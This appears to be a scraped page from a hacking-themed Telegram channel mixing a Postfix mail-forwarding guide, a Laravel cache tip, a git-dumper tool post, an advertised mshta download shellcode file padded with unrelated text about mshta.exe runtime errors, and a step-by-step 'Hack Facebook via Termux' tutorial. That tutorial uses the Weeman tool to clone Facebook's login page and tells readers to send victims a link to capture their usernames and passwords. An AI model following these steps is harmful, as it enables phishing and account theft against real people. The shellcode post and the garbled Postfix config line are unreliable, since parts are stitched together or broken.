UNDERCODE SECURITY
226 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Postfix mail forwarding

Postfix is the most commonly used MTA program that can deliver, receive, or route emails. So, if you want to forward emails with your server and domain then using the postfix program, you can set up email forwarding configurations on the domain like kbuzdar@mydomain.com. This article will guide you about how to set up a postfix mail forwarding method on the CentOS server. For all other distributions like Ubuntu and Debian, almost all the steps are the same.


1) Install Postfix
First, ensure that postfix is installed on your system or not.using the following command you can check the installation of postfix:

 rpm -qa | grep postfix

2) Otherwise, you will install postfix using the following command:

$ sudo dnf install postfix
Once the installation of postfix is complete, now using the following command, you can check the postfix service status:

$ sudo service postfix status
The following output should display on your system.

3) As you can see in the above screenshot, postfix services are active on this system. Now, we can further verify with the help of netstat command that postfix services are running on port 25. Type the following command to do this:

 sudo netstat -ltnp | grep 25

4) Configuration for postfix email forwarding
Now, start the configuration of postfix for forwarding emails. It is a simple task. First, we need to find the postfix configuration directory path by using the postconf command.

 postconf | grep config_directory

5) Now, we have an idea that all postfix configuration files located in the directory /etc/postfix, so move inside the directory and edit the β€˜main.cf’ configuration file.

Open the file in your favorite text editor or which is installed on your system. Here, we are using a vim editor to modify the configuration files.

$ vi /etc/postfix/main.cf

6) Now, you need to add the following lines at the end of the β€˜main.cf’ file.

 = mydomain.com theanotherdomain.com
virtual_alias_maps = hash:/etc/postfix/virtual

7) Reload the postfix

After doing some necessary changes in the postfix configuration files, reload or restart the postfix configurations by using the following command:

 sudo /etc/init.d/postfix reload
# or
$ sudo service postfix reload

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK FACEBOOK VIA TERMUX :
#ForBeginers :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) apt update && upgrade

Now give permission to Termux to access your memory
So type below command

2) termux-setup-storage

Then type this command to install python2

3) pkg install python2

During installation of python2 you will be asked " Termux will use some space"

4) Just type Y and hit enter
Now you have to install git, for that type this command

5) pkg install git

After successfully installing git, type below command to
6) install Weeman

7) git clone https://github.com/evait-security/weeman.git

After that type this command

8) cd weeman && ls

Now you have to type below command to run Weeman on Python

9) python2 weeman.py

Now you will see the Weeman user interface, its time to set all the necessary command

firstly you have to find your IP address, it is important so that you can find your IP address through termux

Just open a new tab on termux and type below command to see your IP

10) ifconfig

11) Now you got your IP address, now type below commands to get started

set url http://facebook.com
set action_url https://facebook.com
set port 8080

Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.

12) How To Hack Facebook Using Termux (Weeman)

If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command

run

Setting up weeman in termux

that's all you have successfully executed all the commands to hack Facebook

Now you have to share your IP with your victim to get his username and password

12) so send a link to your victim as http://Your_IP:8080

Eg: http://127.0.0.1:8080


#forbeginers
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Setting up the Memcached Cache Driver :
for gain some speed
1) You want to speed up Laravel’s cache.

You know by default Laravel uses the file cache driver. You want to use a speedier cache.

2) Use the Memcached cache driver.

Edit app/config/cache.php and change the driver to β€˜memcached’.

'driver' => 'memcached',
3) If you have multiple memcached servers, or they’re running on something other than the local machine, you’ll have to edit the memcached section of app/config/cache.php

#fastTips
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A #tool to dump a git repository from a website.

1) git clone https://github.com/arthaud/git-dumper.git?

2)cd git-dumper

3) pip install -r requirements.txt

4) ./git-dumper.py http://website.com/.git ~/website

F E A T U R E S :

-Fetch all common files (.gitignore, .git/HEAD, .git/index, etc.);

-Find as many refs as possible (such as refs/heads/master, refs/remotes/origin/HEAD, etc.) by analyzing .git/HEAD, .git/logs/HEAD, .git/config, .git/packed-refs and so on;

-Find as many objects (sha1) as possible by analyzing .git/packed-refs, .git/index, .git/refs/* and .git/logs/*;

-Fetch all objects recursively, analyzing each commits to find their parents;

-Run git checkout . to recover the current working tree

βœ…
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE COMMUNITY
48718.c
1.9 KB
#dangerous shellCode
β€” Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
β€” Shellcode Author: Siddharth Sharma
--- Shellcode Length: ~100 bytes
β€” Tested on: WIN7x86
β€” Date: 2020-06-16
πŸ¦‘THE RECENT SHELLCODE HERE CAN USE MSHTA FOR AUTO DOWNLOAD WITHOUT AUTORIZATION...

- SO what is Mshta.exe
-How to Download Mshta.exe and Fix EXE Error Messages

1) EXE files such as mshta.exe are categorized as Win32 EXE (Executable application) files. As a Microsoft (R) HTML Application host file, it was created for use in Internet Explorer by Microsoft.

2) The release of mshta.exe introduced for Windows was on 11/08/2006 in Windows Vista. The most recent release for Microsoft Office Access 2010 14 launched on 07/04/2011 [version 11.00.16299.371 (WinBuild.160101.0800) release]. Mshta.exe is included in Windows 10, Windows 8.1, and Windows 8 versions.

mshta.exe Runtime Errors

3) Runtime errors are Microsoft Office Access 2010 errors that occur during "runtime". Runtime is pretty self-explanatory; it means that these EXE errors are triggered when mshta.exe is attempted to be loaded either when Microsoft Office Access 2010 is starting up, or in some cases already running. Runtime errors are the most common form of EXE error you will encounter using Microsoft Office Access 2010.

4) In most cases, mshta.exe runtime errors occurring while the program is running will result in the program terminating abnormally. Most of these mshta.exe error messages mean that Microsoft Office Access 2010 was either unable to locate this file on startup, or the file is corrupt, resulting in a prematurely-aborted startup process. Generally, Microsoft Office Access 2010 will be unable to start without resolving these errors.

by microsoft
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from WEB UNDERCODE - PRIVATE
Memory Injection like a Boss.pdf
331.5 KB